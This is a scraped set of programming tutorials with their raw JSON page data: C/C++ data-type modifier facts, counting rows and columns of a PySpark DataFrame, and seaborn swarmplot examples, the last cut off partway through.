    // cast y to int so its numeric value is printed
    // (streaming a char would print a character instead)
    cout << "x is " << x << " and y is " << (int)y << endl;
}

C

#include <stdio.h>
int main()
{
    int x;
    char y;
    x = -1;
    y = -2;
    printf("x is %d and y is %d", x, y);
}

Output:
x is -1 and y is -2

3. We can't use any modifiers with the float data type. If the programmer tries to use one, the compiler gives a compile-time error.

C++

#include <iostream>
using namespace std;
int main()
{
    signed float a;
    short float b;
    return (0);
}

C

#include <stdio.h>
int main()
{
    signed float a;
    short float b;
    return (0);
}

Output:
[Error] both 'signed' and 'float' in declaration specifiers
[Error] both 'short' and 'float' in declaration specifiers

4. Only the long modifier is allowed with the double data type. If we try any other modifier, the compiler gives a compile-time error.

C++

#include <iostream>
using namespace std;
int main()
{
    long double a;
    return (0);
}

C

#include <stdio.h>
int main()
{
    long double a;
    return (0);
}

C++

#include <iostream>
using namespace std;
int main()
{
    short double a;
    signed double b;
    return (0);
}

C

#include <stdio.h>
int main()
{
    short double a;
    signed double b;
    return (0);
}

Output:
[Error] both 'short' and 'double' in declaration specifiers
[Error] both 'signed' and 'double' in declaration specifiers

This article is contributed by Bishal Kumar Dubey.

cpp-data-types
interesting-facts
C Language
C++
CPP
[ { "code": null, "e": 52, "s": 24, "text": "\n17 Apr, 2020" }, { "code": null, "e": 160, "s": 52, "text": "Here are some logical and interesting facts about data-types and the modifiers associated with data-types:-" }, { "code": null, "e": 260, "s": 160, "text": "1. If no data type is given to a variable, the compiler automatically converts it to int data type." }, { "code": null, "e": 264, "s": 260, "text": "C++" }, { "code": null, "e": 266, "s": 264, "text": "C" }, { "code": "#include <iostream>using namespace std; int main(){ signed a; signed b; // size of a and b is equal to the size of int cout << \"The size of a is \" << sizeof(a) <<endl; cout << \"The size of b is \" << sizeof(b); return (0);} // This code is contributed by shubhamsingh10", "e": 559, "s": 266, "text": null }, { "code": "#include <stdio.h>int main(){ signed a; signed b; // size of a and b is equal to the size of int printf(\"The size of a is %d\\n\", sizeof(a)); printf(\"The size of b is %d\", sizeof(b)); return (0);}", "e": 777, "s": 559, "text": null }, { "code": null, "e": 816, "s": 777, "text": "The size of a is 4\nThe size of b is 4\n" }, { "code": null, "e": 879, "s": 816, "text": "2. Signed is the default modifier for char and int data types." }, { "code": null, "e": 883, "s": 879, "text": "C++" }, { "code": null, "e": 885, "s": 883, "text": "C" }, { "code": "#include <iostream>using namespace std; int main(){ int x; char y; x = -1; y = -2; cout << \"x is \"<< x <<\" and y is \" << y << endl;} // This code is contributed by shubhamsingh10", "e": 1081, "s": 885, "text": null }, { "code": "#include <stdio.h>int main(){ int x; char y; x = -1; y = -2; printf(\"x is %d and y is %d\", x, y);}", "e": 1195, "s": 1081, "text": null }, { "code": null, "e": 1217, "s": 1195, "text": "x is -1 and y is -2.\n" }, { "code": null, "e": 1351, "s": 1217, "text": "3. We can’t use any modifiers in float data type. If programmer tries to use it ,the compiler automatically gives compile time error." }, { "code": null, "e": 1355, "s": 1351, "text": "C++" }, { "code": null, "e": 1357, "s": 1355, "text": "C" }, { "code": "#include <iostream>using namespace std;int main(){ signed float a; short float b; return (0);}//This article is contributed by shivanisinghss2110", "e": 1512, "s": 1357, "text": null }, { "code": "#include <stdio.h>int main(){ signed float a; short float b; return (0);}", "e": 1595, "s": 1512, "text": null }, { "code": null, "e": 1715, "s": 1595, "text": "[Error] both 'signed' and 'float' in declaration specifiers\n[Error] both 'short' and 'float' in declaration specifiers\n" }, { "code": null, "e": 1895, "s": 1715, "text": "4. Only long modifier is allowed in double data types. We cant use any other specifier with double data type. If we try any other specifier, compiler will give compile time error." 
}, { "code": null, "e": 1899, "s": 1895, "text": "C++" }, { "code": null, "e": 1901, "s": 1899, "text": "C" }, { "code": "#include <iostream>using namespace std;int main(){ long double a; return (0);} // This code is contributed by shubhamsingh10", "e": 2033, "s": 1901, "text": null }, { "code": "#include <stdio.h>int main(){ long double a; return (0);}", "e": 2097, "s": 2033, "text": null }, { "code": null, "e": 2101, "s": 2097, "text": "C++" }, { "code": null, "e": 2103, "s": 2101, "text": "C" }, { "code": "#include <iostream>using namespace std;int main(){ short double a; signed double b; return (0);} // This code is contributed by shubhamsingh10", "e": 2256, "s": 2103, "text": null }, { "code": "#include <stdio.h>int main(){ short double a; signed double b; return (0);}", "e": 2341, "s": 2256, "text": null }, { "code": null, "e": 2463, "s": 2341, "text": "[Error] both 'short' and 'double' in declaration specifiers\n[Error] both 'signed' and 'double' in declaration specifiers\n" }, { "code": null, "e": 2769, "s": 2463, "text": "This article is contributed by Bishal Kumar Dubey. If you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks." }, { "code": null, "e": 2894, "s": 2769, "text": "Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above." }, { "code": null, "e": 2902, "s": 2894, "text": "Rhythm1" }, { "code": null, "e": 2917, "s": 2902, "text": "SHUBHAMSINGH10" }, { "code": null, "e": 2936, "s": 2917, "text": "shivanisinghss2110" }, { "code": null, "e": 2951, "s": 2936, "text": "cpp-data-types" }, { "code": null, "e": 2969, "s": 2951, "text": "interesting-facts" }, { "code": null, "e": 2980, "s": 2969, "text": "C Language" }, { "code": null, "e": 2984, "s": 2980, "text": "C++" }, { "code": null, "e": 2988, "s": 2984, "text": "CPP" } ]
Get number of rows and columns of PySpark dataframe
13 Sep, 2021

In this article, we will discuss how to get the number of rows and the number of columns of a PySpark dataframe. To find the number of rows we will use count(), and to find the number of columns we will use len() on the list of columns.

df.count(): This function returns the number of rows in the Dataframe.

df.distinct().count(): This returns the number of distinct rows, i.e. rows that are not duplicated/repeated in the Dataframe.

df.columns: This attribute (not a function) holds the list of column names of the Dataframe.

len(df.columns): This counts the number of items in that list, i.e. the number of columns.

Example 1: Get the number of rows and number of columns of a dataframe in pyspark.

Python

# importing necessary libraries
from pyspark.sql import SparkSession

# function to create SparkSession
def create_session():
    spk = SparkSession.builder \
        .master("local") \
        .appName("Products.com") \
        .getOrCreate()
    return spk

# function to create Dataframe
def create_df(spark, data, schema):
    df1 = spark.createDataFrame(data, schema)
    return df1

# main function
if __name__ == "__main__":

    # calling function to create SparkSession
    spark = create_session()

    input_data = [(1, "Direct-Cool Single Door Refrigerator", 12499),
                  (2, "Full HD Smart LED TV", 49999),
                  (3, "8.5 kg Washing Machine", 69999),
                  (4, "T-shirt", 1999),
                  (5, "Jeans", 3999),
                  (6, "Men's Running Shoes", 1499),
                  (7, "Combo Pack Face Mask", 999)]

    schm = ["Id", "Product Name", "Price"]

    # calling function to create dataframe
    df = create_df(spark, input_data, schm)
    df.show()

    # extracting number of rows from the Dataframe
    row = df.count()

    # extracting number of columns from the Dataframe
    col = len(df.columns)

    # printing
    print(f'Dimension of the Dataframe is: {(row, col)}')
    print(f'Number of Rows are: {row}')
    print(f'Number of Columns are: {col}')

Output:

Explanation:

For counting the number of rows we are using the count() function, df.count(), which extracts the number of rows from the Dataframe and stores it in the variable named 'row'.

For counting the number of columns we are using df.columns; since this attribute returns the list of column names, len(df.columns) gives us the total number of columns, which we store in the variable named 'col'.

Example 2: Getting the distinct number of rows and the number of columns of the Dataframe.

Python

# importing necessary libraries
from pyspark.sql import SparkSession

# function to create SparkSession
def create_session():
    spk = SparkSession.builder \
        .master("local") \
        .appName("Student_report.com") \
        .getOrCreate()
    return spk

# function to create Dataframe
def create_df(spark, data, schema):
    df1 = spark.createDataFrame(data, schema)
    return df1

# main function
if __name__ == "__main__":

    # calling function to create SparkSession
    spark = create_session()

    input_data = [(1, "Shivansh", "Male", 20, 80),
                  (2, "Arpita", "Female", 18, 66),
                  (3, "Raj", "Male", 21, 90),
                  (4, "Swati", "Female", 19, 91),
                  (5, "Arpit", "Male", 20, 50),
                  (6, "Swaroop", "Male", 23, 65),
                  (6, "Swaroop", "Male", 23, 65),
                  (6, "Swaroop", "Male", 23, 65),
                  (7, "Reshabh", "Male", 19, 70),
                  (7, "Reshabh", "Male", 19, 70),
                  (8, "Dinesh", "Male", 20, 75),
                  (9, "Rohit", "Male", 21, 85),
                  (9, "Rohit", "Male", 21, 85),
                  (10, "Sanjana", "Female", 22, 87)]

    schm = ["Id", "Name", "Gender", "Age", "Percentage"]

    # calling function to create dataframe
    df = create_df(spark, input_data, schm)
    df.show()

    # extracting number of distinct rows
    # from the Dataframe
    row = df.distinct().count()

    # extracting total number of rows from
    # the Dataframe
    all_rows = df.count()

    # extracting number of columns from the
    # Dataframe
    col = len(df.columns)

    # printing
    print(f'Dimension of the Dataframe is: {(row, col)}')
    print(f'Distinct Number of Rows are: {row}')
    print(f'Total Number of Rows are: {all_rows}')
    print(f'Number of Columns are: {col}')

Output:

Explanation:

For counting the number of distinct rows we are using the distinct().count() function, which extracts the number of distinct rows from the Dataframe and stores it in the variable named 'row'.

For counting the number of columns we again use len(df.columns), which gives the total number of columns, stored in the variable named 'col'.

Example 3: Getting the number of columns using the dtypes attribute.

In this example, after creating the Dataframe we count the rows with count() and count the columns with dtypes. The dtypes attribute returns a list of (column name, datatype) tuples, one tuple per column, so the number of tuples equals the number of columns. Counting these tuples is therefore another way to get the number of columns.

Python

# importing necessary libraries
from pyspark.sql import SparkSession

# function to create SparkSession
def create_session():
    spk = SparkSession.builder \
        .master("local") \
        .appName("Student_report.com") \
        .getOrCreate()
    return spk

# function to create Dataframe
def create_df(spark, data, schema):
    df1 = spark.createDataFrame(data, schema)
    return df1

# main function
if __name__ == "__main__":

    # calling function to create SparkSession
    spark = create_session()

    input_data = [(1, "Shivansh", "Male", 20, 80),
                  (2, "Arpita", "Female", 18, 66),
                  (3, "Raj", "Male", 21, 90),
                  (4, "Swati", "Female", 19, 91),
                  (5, "Arpit", "Male", 20, 50),
                  (6, "Swaroop", "Male", 23, 65),
                  (7, "Reshabh", "Male", 19, 70),
                  (8, "Dinesh", "Male", 20, 75),
                  (9, "Rohit", "Male", 21, 85),
                  (10, "Sanjana", "Female", 22, 87)]

    schm = ["Id", "Name", "Gender", "Age", "Percentage"]

    # calling function to create dataframe
    df = create_df(spark, input_data, schm)
    df.show()

    # extracting number of rows from the Dataframe
    row = df.count()

    # extracting number of columns from the Dataframe
    # using the dtypes attribute
    col = len(df.dtypes)

    # printing
    print(f'Dimension of the Dataframe is: {(row, col)}')
    print(f'Number of Rows are: {row}')
    print(f'Number of Columns are: {col}')

Output:

Example 4: Getting the dimension of the PySpark Dataframe by converting it to a Pandas Dataframe.

In the example code, after creating the Dataframe we convert the PySpark Dataframe to a Pandas Dataframe with the toPandas() function by writing df.toPandas(). After converting, we use the Pandas shape attribute to get the dimension of the Dataframe. shape returns a (rows, columns) tuple, so the number of rows and columns can also be printed individually.

Python

# importing necessary libraries
from pyspark.sql import SparkSession

# function to create SparkSession
def create_session():
    spk = SparkSession.builder \
        .master("local") \
        .appName("Student_report.com") \
        .getOrCreate()
    return spk

# function to create Dataframe
def create_df(spark, data, schema):
    df1 = spark.createDataFrame(data, schema)
    return df1

# main function
if __name__ == "__main__":

    # calling function to create SparkSession
    spark = create_session()

    input_data = [(1, "Shivansh", "Male", 20, 80),
                  (2, "Arpita", "Female", 18, 66),
                  (3, "Raj", "Male", 21, 90),
                  (4, "Swati", "Female", 19, 91),
                  (5, "Arpit", "Male", 20, 50),
                  (6, "Swaroop", "Male", 23, 65),
                  (7, "Reshabh", "Male", 19, 70),
                  (8, "Dinesh", "Male", 20, 75),
                  (9, "Rohit", "Male", 21, 85),
                  (10, "Sanjana", "Female", 22, 87)]

    schm = ["Id", "Name", "Gender", "Age", "Percentage"]

    # calling function to create dataframe
    df = create_df(spark, input_data, schm)
    df.show()

    # converting PySpark df to Pandas df using
    # toPandas() function
    new_df = df.toPandas()

    # using the Pandas shape attribute to get the
    # dimension of the df
    dimension = new_df.shape

    # printing
    print("Dimension of the Dataframe is: ", dimension)
    print(f'Number of Rows are: {dimension[0]}')
    print(f'Number of Columns are: {dimension[1]}')

Output:

Picked
Python-Pyspark
Python
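Since this shape check comes up often, it can be handy to wrap it in a small helper. The sketch below is not part of the original article, and the helper name spark_shape is made up for illustration; it reuses only df.count() and df.columns, exactly as in the examples above.

Python

# Hypothetical helper (assumed example, not from the original article)
def spark_shape(df):
    # (number of rows, number of columns), mirroring pandas' df.shape
    return (df.count(), len(df.columns))

# usage with the dataframe created in the examples above:
# rows, cols = spark_shape(df)
# print(f'Dimension of the Dataframe is: {(rows, cols)}')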
[ { "code": null, "e": 28, "s": 0, "text": "\n13 Sep, 2021" }, { "code": null, "e": 262, "s": 28, "text": "In this article, we will discuss how to get the number of rows and the number of columns of a PySpark dataframe. For finding the number of rows and number of columns we will use count() and columns() with len() function respectively." }, { "code": null, "e": 342, "s": 262, "text": "df.count(): This function is used to extract number of rows from the Dataframe." }, { "code": null, "e": 472, "s": 342, "text": "df.distinct().count(): This functions is used to extract distinct number rows which are not duplicate/repeating in the Dataframe." }, { "code": null, "e": 571, "s": 472, "text": "df.columns(): This function is used to extract the list of columns names present in the Dataframe." }, { "code": null, "e": 656, "s": 571, "text": "len(df.columns): This function is used to count number of items present in the list." }, { "code": null, "e": 737, "s": 656, "text": "Example 1: Get the number of rows and number of columns of dataframe in pyspark." }, { "code": null, "e": 744, "s": 737, "text": "Python" }, { "code": "# importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \\ .master(\"local\") \\ .appName(\"Products.com\") \\ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == \"__main__\": # calling function to create SparkSession spark = create_session() input_data = [(1,\"Direct-Cool Single Door Refrigerator\",12499), (2,\"Full HD Smart LED TV\",49999), (3,\"8.5 kg Washing Machine\",69999), (4,\"T-shirt\",1999), (5,\"Jeans\",3999), (6,\"Men's Running Shoes\",1499), (7,\"Combo Pack Face Mask\",999)] schm = [\"Id\",\"Product Name\",\"Price\"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # extracting number of rows from the Dataframe row = df.count() # extracting number of columns from the Dataframe col = len(df.columns) # printing print(f'Dimension of the Dataframe is: {(row,col)}') print(f'Number of Rows are: {row}') print(f'Number of Columns are: {col}')", "e": 1929, "s": 744, "text": null }, { "code": null, "e": 1937, "s": 1929, "text": "Output:" }, { "code": null, "e": 1950, "s": 1937, "text": "Explanation:" }, { "code": null, "e": 2126, "s": 1950, "text": "For counting the number of rows we are using the count() function df.count() which extracts the number of rows from the Dataframe and storing it in the variable named as ‘row’" }, { "code": null, "e": 2452, "s": 2126, "text": "For counting the number of columns we are using df.columns() but as this function returns the list of columns names, so for the count the number of items present in the list we are using len() function in which we are passing df.columns() this gives us the total number of columns and store it in the variable named as ‘col’." }, { "code": null, "e": 2525, "s": 2452, "text": "Example 2: Getting the Distinct number of rows and columns of Dataframe." 
}, { "code": null, "e": 2532, "s": 2525, "text": "Python" }, { "code": "# importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \\ .master(\"local\") \\ .appName(\"Student_report.com\") \\ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == \"__main__\": # calling function to create SparkSession spark = create_session() input_data = [(1,\"Shivansh\",\"Male\",20,80), (2,\"Arpita\",\"Female\",18,66), (3,\"Raj\",\"Male\",21,90), (4,\"Swati\",\"Female\",19,91), (5,\"Arpit\",\"Male\",20,50), (6,\"Swaroop\",\"Male\",23,65), (6,\"Swaroop\",\"Male\",23,65), (6,\"Swaroop\",\"Male\",23,65), (7,\"Reshabh\",\"Male\",19,70), (7,\"Reshabh\",\"Male\",19,70), (8,\"Dinesh\",\"Male\",20,75), (9,\"Rohit\",\"Male\",21,85), (9,\"Rohit\",\"Male\",21,85), (10,\"Sanjana\",\"Female\",22,87)] schm = [\"Id\",\"Name\",\"Gender\",\"Age\",\"Percentage\"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # extracting number of distinct rows # from the Dataframe row = df.distinct().count() # extracting total number of rows from # the Dataframe all_rows = df.count() # extracting number of columns from the # Dataframe col = len(df.columns) # printing print(f'Dimension of the Dataframe is: {(row,col)}') print(f'Distinct Number of Rows are: {row}') print(f'Total Number of Rows are: {all_rows}') print(f'Number of Columns are: {col}')", "e": 4128, "s": 2532, "text": null }, { "code": null, "e": 4139, "s": 4131, "text": "Output:" }, { "code": null, "e": 4156, "s": 4143, "text": "Explanation:" }, { "code": null, "e": 4348, "s": 4158, "text": "For counting the number of distinct rows we are using distinct().count() function which extracts the number of distinct rows from the Dataframe and storing it in the variable named as ‘row’" }, { "code": null, "e": 4673, "s": 4348, "text": "For counting the number of columns we are using df.columns() but as this functions returns the list of column names, so for the count the number of items present in the list we are using len() function in which we are passing df.columns() this gives us the total number of columns and store it in the variable named as ‘col’" }, { "code": null, "e": 4739, "s": 4675, "text": "Example 3: Getting the number of columns using dtypes function." }, { "code": null, "e": 5309, "s": 4741, "text": "In the example, after creating the Dataframe we are counting a number of rows using count() function and for counting the number of columns here we are using dtypes function. Since we know that dtypes function returns the list of tuples that contains the column name and datatype of the columns. So for every column, there is the tuple that contains the name and datatype of the column, from the list we are just counting the tuples The number of tuples is equal to the number of columns so this is also the one way to get the number of columns using dtypes function." 
}, { "code": null, "e": 5318, "s": 5311, "text": "Python" }, { "code": "# importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \\ .master(\"local\") \\ .appName(\"Student_report.com\") \\ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == \"__main__\": # calling function to create SparkSession spark = create_session() input_data = [(1,\"Shivansh\",\"Male\",20,80), (2,\"Arpita\",\"Female\",18,66), (3,\"Raj\",\"Male\",21,90), (4,\"Swati\",\"Female\",19,91), (5,\"Arpit\",\"Male\",20,50), (6,\"Swaroop\",\"Male\",23,65), (7,\"Reshabh\",\"Male\",19,70), (8,\"Dinesh\",\"Male\",20,75), (9,\"Rohit\",\"Male\",21,85), (10,\"Sanjana\",\"Female\",22,87)] schm = [\"Id\",\"Name\",\"Gender\",\"Age\",\"Percentage\"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # extracting number of rows from the Dataframe row = df.count() # extracting number of columns from the Dataframe using dtypes function col = len(df.dtypes) # printing print(f'Dimension of the Dataframe is: {(row,col)}') print(f'Number of Rows are: {row}') print(f'Number of Columns are: {col}')", "e": 6622, "s": 5318, "text": null }, { "code": null, "e": 6633, "s": 6625, "text": "Output:" }, { "code": null, "e": 6748, "s": 6637, "text": "Example 4: Getting the dimension of the PySpark Dataframe by converting PySpark Dataframe to Pandas Dataframe." }, { "code": null, "e": 7121, "s": 6750, "text": "In the example code, after creating the Dataframe, we are converting the PySpark Dataframe to Pandas Dataframe using toPandas() function by writing df.toPandas(). After converting the dataframe we are using Pandas function shape for getting the dimension of the Dataframe. This shape function returns the tuple, so for printing the number of row and column individually." 
}, { "code": null, "e": 7130, "s": 7123, "text": "Python" }, { "code": "# importing necessary librariesfrom pyspark.sql import SparkSession # function to create SparkSessiondef create_session(): spk = SparkSession.builder \\ .master(\"local\") \\ .appName(\"Student_report.com\") \\ .getOrCreate() return spk # function to create Dataframedef create_df(spark,data,schema): df1 = spark.createDataFrame(data,schema) return df1 # main functionif __name__ == \"__main__\": # calling function to create SparkSession spark = create_session() input_data = [(1,\"Shivansh\",\"Male\",20,80), (2,\"Arpita\",\"Female\",18,66), (3,\"Raj\",\"Male\",21,90), (4,\"Swati\",\"Female\",19,91), (5,\"Arpit\",\"Male\",20,50), (6,\"Swaroop\",\"Male\",23,65), (7,\"Reshabh\",\"Male\",19,70), (8,\"Dinesh\",\"Male\",20,75), (9,\"Rohit\",\"Male\",21,85), (10,\"Sanjana\",\"Female\",22,87)] schm = [\"Id\",\"Name\",\"Gender\",\"Age\",\"Percentage\"] # calling function to create dataframe df = create_df(spark,input_data,schm) df.show() # converting PySpark df to Pandas df using # toPandas() function new_df = df.toPandas() # using Pandas shape function for getting the # dimension of the df dimension = new_df.shape # printing print(\"Dimension of the Dataframe is: \",dimension) print(f'Number of Rows are: {dimension[0]}') print(f'Number of Columns are: {dimension[1]}')", "e": 8477, "s": 7130, "text": null }, { "code": null, "e": 8488, "s": 8480, "text": "Output:" }, { "code": null, "e": 8504, "s": 8492, "text": "anikakapoor" }, { "code": null, "e": 8520, "s": 8504, "text": "rajeev0719singh" }, { "code": null, "e": 8527, "s": 8520, "text": "Picked" }, { "code": null, "e": 8542, "s": 8527, "text": "Python-Pyspark" }, { "code": null, "e": 8549, "s": 8542, "text": "Python" } ]
Swarmplot using Seaborn in Python
06 Nov, 2020

Seaborn is an amazing visualization library for statistical graphics plotting in Python. It provides beautiful default styles and color palettes to make statistical plots more attractive. It is built on top of the matplotlib library and is also closely integrated with the data structures from pandas.

A seaborn swarmplot is similar to a stripplot, except that the points are adjusted so that they do not overlap, which gives a better representation of the distribution of values. A swarm plot can be drawn on its own, but it is also a good complement to a box or violin plot when you want to show all observations along with a summary of the distribution. This type of plot is sometimes known as a "beeswarm".

Syntax: seaborn.swarmplot(x=None, y=None, hue=None, data=None, order=None, hue_order=None, dodge=False, orient=None, color=None, palette=None, size=5, edgecolor='gray', linewidth=0, ax=None, **kwargs)

Parameters:
x, y, hue: Inputs for plotting long-form data.
data: Dataset for plotting.
color: Color for all of the elements.
size: Radius of the markers, in points.

Example 1: Basic visualization of the "fmri" dataset using swarmplot()

Python3

import seaborn

seaborn.set(style='whitegrid')
fmri = seaborn.load_dataset("fmri")

seaborn.swarmplot(x="timepoint",
                  y="signal",
                  data=fmri)

Output:

Example 2: Grouping the data points on the basis of a category, here region.

Python3

import seaborn

seaborn.set(style='whitegrid')
fmri = seaborn.load_dataset("fmri")

seaborn.swarmplot(x="timepoint",
                  y="signal",
                  hue="region",
                  data=fmri)

Output:

Example 3: Basic visualization of the "tips" dataset using swarmplot()

Python3

import seaborn

seaborn.set(style='whitegrid')
tip = seaborn.load_dataset('tips')

seaborn.swarmplot(x='day', y='tip', data=tip)

Output:

1. Draw a single horizontal swarm plot using only one axis:

If we pass only one data variable instead of two, the points are drawn along a single axis: x draws them along the x-axis and y along the y-axis.

Syntax:

seaborn.swarmplot(x)

Python3

# Python program to illustrate
# swarmplot using inbuilt data-set
# given in seaborn

# importing the required module
import seaborn

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

seaborn.swarmplot(x=tips["total_bill"])

Output:

2. Draw horizontal swarms:

The example above shows a single horizontal swarm plot; we can draw several horizontal swarms by putting the numeric variable on the x-axis and the categorical variable on the y-axis.

Python3

# Python program to illustrate
# swarmplot using inbuilt data-set
# given in seaborn

# importing the required module
import seaborn

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

seaborn.swarmplot(x="total_bill", y="day", data=tips)

Output:

3. Using the hue parameter:

While the points are plotted in two dimensions, another dimension can be added to the plot by coloring the points according to a third variable.

Syntax:

seaborn.swarmplot(x, y, hue, data)

Python3

# Python program to illustrate
# swarmplot using inbuilt data-set
# given in seaborn

# importing the required module
import seaborn

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

seaborn.swarmplot(x="day", y="total_bill", hue="time", data=tips)

Output:

4. Draw outlines around the data points using linewidth:

linewidth sets the width of the gray lines that frame the plot elements; increasing it makes the outline around each point thicker.

Syntax:

seaborn.swarmplot(x, y, data, linewidth)

Python3

# Python program to illustrate
# swarmplot using inbuilt data-set
# given in seaborn

# importing the required module
import seaborn

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

seaborn.swarmplot(x="day", y="total_bill", data=tips, linewidth=2)

Output:

We can change the outline color with edgecolor:

Python3

seaborn.swarmplot(y="total_bill", x="day", data=tips,
                  linewidth=2, edgecolor='green')

Output:

5. Draw each level of the hue variable at different locations on the major categorical axis:

When using hue nesting, setting dodge=True separates the points for the different hue levels along the categorical axis, and palette selects the colors used for the hue levels.

Syntax:

seaborn.swarmplot(x, y, data, hue, palette, dodge)

Python3

# Python program to illustrate
# swarmplot using inbuilt data-set
# given in seaborn

# importing the required module
import seaborn

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

seaborn.swarmplot(x="day", y="total_bill", hue="smoker",
                  data=tips, palette="Set2", dodge=True)

Output:

Possible values of palette are:

Accent, Accent_r, Blues, Blues_r, BrBG, BrBG_r, BuGn, BuGn_r, BuPu, BuPu_r, CMRmap, CMRmap_r, Dark2, Dark2_r, GnBu, GnBu_r, Greens, Greens_r, Greys, Greys_r, OrRd, OrRd_r, Oranges, Oranges_r, PRGn, PRGn_r, Paired, Paired_r, Pastel1, Pastel1_r, Pastel2, Pastel2_r, PiYG, PiYG_r, PuBu, PuBuGn, PuBuGn_r, PuBu_r, PuOr, PuOr_r, PuRd, PuRd_r, Purples, Purples_r, RdBu, RdBu_r, RdGy, RdGy_r, RdPu, RdPu_r, RdYlBu, RdYlBu_r, RdYlGn, RdYlGn_r, Reds, Reds_r, Set1, Set1_r, Set2, Set2_r, Set3, Set3_r, Spectral, Spectral_r, Wistia, Wistia_r, YlGn, YlGnBu, YlGnBu_r, YlGn_r, YlOrBr, YlOrBr_r, YlOrRd, YlOrRd_r, afmhot, afmhot_r, autumn, autumn_r, binary, binary_r, bone, bone_r, brg, brg_r, bwr, bwr_r, cividis, cividis_r, cool, cool_r, coolwarm, coolwarm_r, copper, copper_r, cubehelix, cubehelix_r, flag, flag_r, gist_earth, gist_earth_r, gist_gray, gist_gray_r, gist_heat, gist_heat_r, gist_ncar, gist_ncar_r, gist_rainbow, gist_rainbow_r, gist_stern, and more.

6. Plotting large points and different aesthetics with the marker and alpha parameters:

We use alpha to control the transparency of the data points and marker to customize their shape.

Python3

# Python program to illustrate
# swarmplot using inbuilt data-set
# given in seaborn

# importing the required module
import seaborn

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

seaborn.swarmplot(x="day", y="total_bill", hue="smoker",
                  data=tips, palette="Set2", size=20,
                  marker="D", edgecolor="gray", alpha=.25)

Output:

7. Control the swarm order by passing an explicit order:

Python3

# Python program to illustrate
# swarmplot using inbuilt data-set
# given in seaborn

# importing the required module
import seaborn

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

seaborn.swarmplot(x="time", y="tip", data=tips,
                  order=["Dinner", "Lunch"])

Output:

8. Adding the size attribute:

Using size we can draw the points at different sizes.

Syntax:

seaborn.swarmplot(x, y, data, size)

Python3

# Python program to illustrate
# swarmplot using inbuilt data-set
# given in seaborn

# importing the required module
import seaborn

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

seaborn.swarmplot(x='day', y='total_bill', data=tips,
                  hue='smoker', size=10)

Output:

9. Adding the palette attribute:

Using palette we can color the points with a chosen colormap. In the example below, the swarmplot is drawn with the 'pastel' palette.

Syntax:

seaborn.swarmplot(x, y, data, palette="color_name")

Python3

# Python program to illustrate
# swarmplot using inbuilt data-set
# given in seaborn

# importing the required module
import seaborn

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

seaborn.swarmplot(x='day', y='total_bill', data=tips,
                  hue='time', palette='pastel')

Output:

Python-Seaborn
Python
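The article notes that a swarm plot complements a box plot well. The sketch below is not part of the original article; it overlays a swarmplot on a boxplot of the same tips data, so the raw observations and the summary statistics are visible together on one set of axes.

Python3

# Overlay sketch (assumed example, not from the original article)
import seaborn
import matplotlib.pyplot as plt

# use to set style of background of plot
seaborn.set(style="whitegrid")

# loading data-set
tips = seaborn.load_dataset("tips")

# draw the box plot first as the background summary
ax = seaborn.boxplot(x="day", y="total_bill", data=tips, color="lightgray")

# overlay the individual observations on the same axes
seaborn.swarmplot(x="day", y="total_bill", data=tips,
                  color="black", size=3, ax=ax)

plt.show()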
[ { "code": null, "e": 52, "s": 24, "text": "\n06 Nov, 2020" }, { "code": null, "e": 355, "s": 52, "text": "Seaborn is an amazing visualization library for statistical graphics plotting in Python. It provides beautiful default styles and color palettes to make statistical plots more attractive. It is built on the top of the matplotlib library and also closely integrated into the data structures from pandas." }, { "code": null, "e": 762, "s": 355, "text": "Seaborn swarmplot is probably similar to stripplot, only the points are adjusted so it won’t get overlap to each other as it helps to represent the better representation of the distribution of values. A swarm plot can be drawn on its own, but it is also a good complement to a box, preferable because the associated names will be used to annotate the axes. This type of plot sometimes known as “beeswarm”. " }, { "code": null, "e": 964, "s": 762, "text": "Syntax: seaborn.swarmplot(x=None, y=None, hue=None, data=None, order=None, hue_order=None, dodge=False, orient=None, color=None, palette=None, size=5, edgecolor=’gray’, linewidth=0, ax=None, **kwargs) " }, { "code": null, "e": 1129, "s": 964, "text": "Parameters: x, y, hue: Inputs for plotting long-form data. data: Dataset for plotting. color: Color for all of the elements size: Radius of the markers, in points. " }, { "code": null, "e": 1198, "s": 1129, "text": "Example 1: Basic visualization of “fmri” dataset using swarmplot() " }, { "code": null, "e": 1206, "s": 1198, "text": "Python3" }, { "code": "import seaborn seaborn.set(style='whitegrid')fmri = seaborn.load_dataset(\"fmri\") seaborn.swarmplot(x=\"timepoint\", y=\"signal\", data=fmri)", "e": 1378, "s": 1206, "text": null }, { "code": null, "e": 1387, "s": 1378, "text": "Output: " }, { "code": null, "e": 1471, "s": 1387, "text": "Example 2: Grouping data points on the basis of category, here as region and event." }, { "code": null, 